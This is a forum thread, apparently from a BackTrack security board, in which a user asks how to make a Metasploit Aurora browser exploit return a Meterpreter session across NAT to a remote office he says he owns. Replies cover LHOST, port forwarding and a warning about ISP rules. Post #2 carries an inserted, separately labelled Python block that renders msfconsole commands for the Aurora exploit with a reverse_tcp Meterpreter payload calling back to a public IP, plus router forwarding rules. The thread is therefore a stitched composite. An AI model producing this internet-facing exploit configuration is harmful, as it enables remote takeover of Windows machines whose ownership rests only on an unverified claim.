
Thread: exploiting beyond the LAN

  1. #1 Senior Member (Join Date: Jan 2010, Posts: 173)

    exploiting beyond the LAN

    Hi Fellaz,

    I've successfully exploited various Win XP machines on my LAN in a lab environment using SET and the Aurora exploit, but that is locally. How can these exploits be used against the other side of the router on MY remote office PCs (i.e. I want to try and pentest outside the local LAN)? Will the exploit's Meterpreter session come back to me on my LHOST 192.168.0.8 address even if it is not on the same LAN? If not, how can it be achieved?

    Pentest office: attack machine IP 192.168.0.8, public IP 96.xxx.xxx.xxx
    Remote office, different LAN: victim IP 192.168.1.9, public IP 92.xxx.xxx.xxx
    MY OWN, btw; both the victim machine and the attack machine are owned by myself.

    Both IP addresses differ (92.xxx.xxx.xxx and 96.xxx.xxx.xxx), so how do I get Metasploit past my remote router into the LAN side?

    As stated, I own both networks but have not pwned yet.
    Googled and not found a thing apart from changing LHOST to the public IP, but that's just the router, isn't it?

    Kind Regardz DEE


    Hi

    Thanks for your response to my problem. I am still having problems with the port forward feature... After your advice I have set up my attack-side LAN router to forward incoming connections on port 4444 TCP/UDP to any host on the LAN.

    Now when I do an Aurora attack on my office, for the connection back to my BackTrack 4 machine (IP 192.168.0.8) I have set LHOST to my router's IP address, 90.xxx.xxx.114. I get my router login pop-up after the IP address is input in the browser. My router settings are:

    Firmware Version 1.9Sky
    ADSL Port
    MAC Address 00:xx:69:xx:34:xx
    IP Address 90.xxx.xxx.114 (is the one i used in LHOST)
    Network Type PPPoA
    IP Subnet Mask 255.255.255.255
    Gateway IP Address=89.xxx.128.xxx
    Domain Name Server =90.xxx.xxx.97 90.xxx.xxx.99
    LAN Port
    MAC Address 00:xx:xx:xx:xx:d6
    IP Address 192.168.0.1
    DHCP enable
    IP Subnet Mask 255.255.255.0

    Please advise as to which IP to use in my LHOST so that the packets are forwarded from there on to my local IP 192.168.0.8.

    Do I use the gateway IP instead?

    Thanks again; this is the final part for me to pentest my office remotely.

    BTW ESET SMART SECURITY IS THE MUTZ NUTZ ... defeats arp poisoning and much more.
    Last edited by pentest09; 02-06-2010 at 07:07 PM.

  2. #2 Snayler, "My life is this forum" (Join Date: Jan 2010, Posts: 1,418)

    Re: exploiting beyond the LAN

    I've already responded to this thread in the old forums, but for those who might be interested in the answer, I'll post it here too. I changed some things to make the post clearer, as it caused some confusion in OP's head and now I understand why.
    -----------------------
    Quote Originally Posted by pentest09 View Post
    want to try and pentest outside the local lan, will the exploit meterpreter session come back to me on my LHOST 192.168.0.8 address even if not on the same lan.
    Obviously not. If you did that, Meterpreter would try to communicate with 192.168.0.8, but on your remote office's local network. You would have to set your LHOST to your pentest office's IP on the net and port-forward Meterpreter's port to your local IP (this is done on your pentest office router's configuration pages).

    Quote Originally Posted by pentest09 View Post
    As stated I own both networks but not Pwnd yet.
    Googled and not found a thing apart from changing LHOST to public ip but thats just the router isnt it?
    Yes, that's just the router, unless you port-forward like I said above, so that the router knows what to do with the incoming connection.
    Last edited by Snayler; 02-05-2010 at 01:10 AM. Reason: Making it clearer...
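    The following is an added example, not code from Snayler, pentest09 or the BackTrack project, that puts the answer above into working form. It uses the real Metasploit options for this situation: LHOST is the address the payload connects back to (the router's public WAN address), while the advanced option ReverseListenerBindAddress is the LAN interface the handler actually binds on the attack box. The Aurora module path exploit/windows/browser/ms10_002_aurora is Metasploit's own; the addresses 96.1.2.3 / 192.168.0.8 and the port numbers are constructed for the example. The probe at the end only proves the LAN-side bind works; whether the router forwards has to be checked from outside the LAN.

```python
"""Reverse-handler settings for a Metasploit listener that sits behind a NAT router."""
import ipaddress
import socket
import threading


def is_private(addr: str) -> bool:
    """True for RFC 1918 / loopback addresses, which a victim on another site cannot route to."""
    return ipaddress.ip_address(addr).is_private


def lhost_is_usable(public_ip: str) -> bool:
    """LHOST is embedded in the payload, so it must be an address the victim can reach."""
    return not is_private(public_ip)


def handler_options(lan_ip: str, public_ip: str, lport: int) -> dict:
    """Options for a reverse_tcp handler on a host behind NAT.

    LHOST -> what the victim connects back to (router WAN address, never 192.168.x.x).
    ReverseListenerBindAddress -> where msfconsole binds locally; without it Metasploit
    would try to bind the public address, which is not on any local interface.
    """
    if not is_private(lan_ip):
        raise ValueError(f"{lan_ip} is not a private LAN address")
    if not lhost_is_usable(public_ip):
        raise ValueError(f"LHOST {public_ip} is private; the victim cannot route to it")
    if not 1 <= lport <= 65535:
        raise ValueError(f"bad port {lport}")
    return {
        "LHOST": public_ip,
        "LPORT": lport,
        "ReverseListenerBindAddress": lan_ip,
        "ReverseListenerBindPort": lport,
    }


def forwarding_rules(public_ip: str, lan_ip: str, ports: list) -> list:
    """Router rules needed: one TCP forward per port, WAN -> attack box.

    reverse_tcp is TCP only, so the UDP half of a TCP/UDP rule is never used.
    A browser exploit also needs its web-server port (SRVPORT) forwarded, since the
    victim's browser must reach it, hence the list of ports rather than just LPORT.
    """
    return [f"tcp {public_ip}:{p} -> {lan_ip}:{p}" for p in ports]


def resource_script(opts: dict, srvhost: str, srvport: int = 8080) -> str:
    """Render msfconsole lines for the Aurora module (constructed example)."""
    lines = [
        "use exploit/windows/browser/ms10_002_aurora",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set SRVHOST {srvhost}",   # bind the exploit web server on the LAN side too
        f"set SRVPORT {srvport}",
    ]
    lines += [f"set {k} {v}" for k, v in opts.items()]
    lines.append("exploit -j")
    return "\n".join(lines) + "\n"


def probe_bind(bind_ip: str, port: int, timeout: float = 2.0) -> bool:
    """Bind a throwaway listener on bind_ip:port and confirm a TCP connect reaches it.

    This checks the LAN side only. Browsing to the public IP from inside the LAN
    normally hits the router's own admin page (the 'router login' the OP saw), so
    the external check must come from a host outside the LAN. port=0 picks a free port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        srv.bind((bind_ip, port))
    except OSError:
        srv.close()
        return False
    port = srv.getsockname()[1]
    srv.listen(1)
    srv.settimeout(timeout)
    received = []

    def accept_one():
        try:
            conn, _ = srv.accept()
            received.append(conn.recv(16))
            conn.close()
        except OSError:
            pass

    t = threading.Thread(target=accept_one)
    t.start()
    try:
        with socket.create_connection((bind_ip, port), timeout=timeout) as c:
            c.sendall(b"probe")
    except OSError:
        pass
    t.join()
    srv.close()
    return received == [b"probe"]


if __name__ == "__main__":
    opts = handler_options("192.168.0.8", "96.1.2.3", 4444)
    print(resource_script(opts, "192.168.0.8"))
    print("\n".join(forwarding_rules("96.1.2.3", "192.168.0.8", [4444, 8080])))
    print("LAN-side bind works:", probe_bind("192.168.0.8", 4444) or probe_bind("127.0.0.1", 0))
```

    The gateway IP and the DNS servers listed in the router's ADSL settings belong to the ISP and are never what goes in LHOST; only the WAN address assigned to the router is reachable from the remote site, and only with the forward in place.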

  3. #3 Gitsnik, "Very good friend of the forum" (Join Date: Jan 2010, Location: The Crystal Wind, Posts: 851)

    Re: exploiting beyond the LAN

    I was going to respond over there, but I think I'll do it here.

    If you own both of those networks you are either in charge of them (i.e. CEO), or you are a network guy. If you are the CEO you need to look into how things work on the Internet, specifically NAT, routing, private/public IP addressing, and the TCP protocol. If you are the network guy in charge, you need to turn in your geek card for not knowing the basics.

    Either way you have a course to try
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4 lupin, Super Moderator (Join Date: Jan 2010, Posts: 2,943)

    Re: exploiting beyond the LAN

    You had better also make sure that both of your ISPs (your home account ISP and your business account ISP) allow attack traffic to be sent over their connections.

    And if you don't already know how things like NAT work, sending attack traffic over the Internet may be a dangerous proposition. What if you end up attacking the wrong person by mistake?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5 Senior Member (Join Date: Jan 2010, Posts: 173)

    Re: exploiting beyond the LAN

    Hi again Fellaz,

    Thanks for your responses. Now I have tried to point the Meterpreter LHOST at my public IP on my attack machine's net, but when I try the Aurora exploit it brings up my router login page. I have 3 IPs in my router set-up:

    ADSL PORT SETTINGS

    1: IP address = 90.219.xxx.xxx (which I used as LHOST, with port 4444, in Metasploit)


    2: Gateway IP Address = 89.xxxx.128.xxxx

    3: Domain Name Server 90.xxx.xxx.97 90.xxx.xxx.99

    and LAN IP = 192.168.0.8, the BackTrack machine with the listener.

    Now which IP is the one for the exploit to connect to and forward on to my LAN IP?

    Everything works fine in the LAN (SET, MSF and so on). Please help, as I can't get it working; I googled but there is not much in the way of this, and remote-exploit.org is down on all my machines, so I think it's being updated and I can't connect.

    regards DEE

    Ps: Much appreciated the replies.

  6. #6 Senior Member (Join Date: Jan 2010, Posts: 173)

    Re: exploiting beyond the LAN

    OK lads, I think I get the gist.

    Usually LHOST is the path back from the victim, which internally is the local IP, so I just set it to the path back to the attack-net router, use the DMZ option to forward the connection on to the attacker machine's local IP, and set up the firewall rule on the router to accept the incoming connection on port, say, 5555, to just the WAN IP locally, i.e. 192.168.0.6.

    But............. I checked the port via a port checker to see if it is open, and the only one that shows open is uTorrent's port; all the others seem closed.

    Getting there slowly, trying again today. Thanks for all your replies, and pureh@te, you're a tough cookie, fella, but thanks all the same.

    DEE
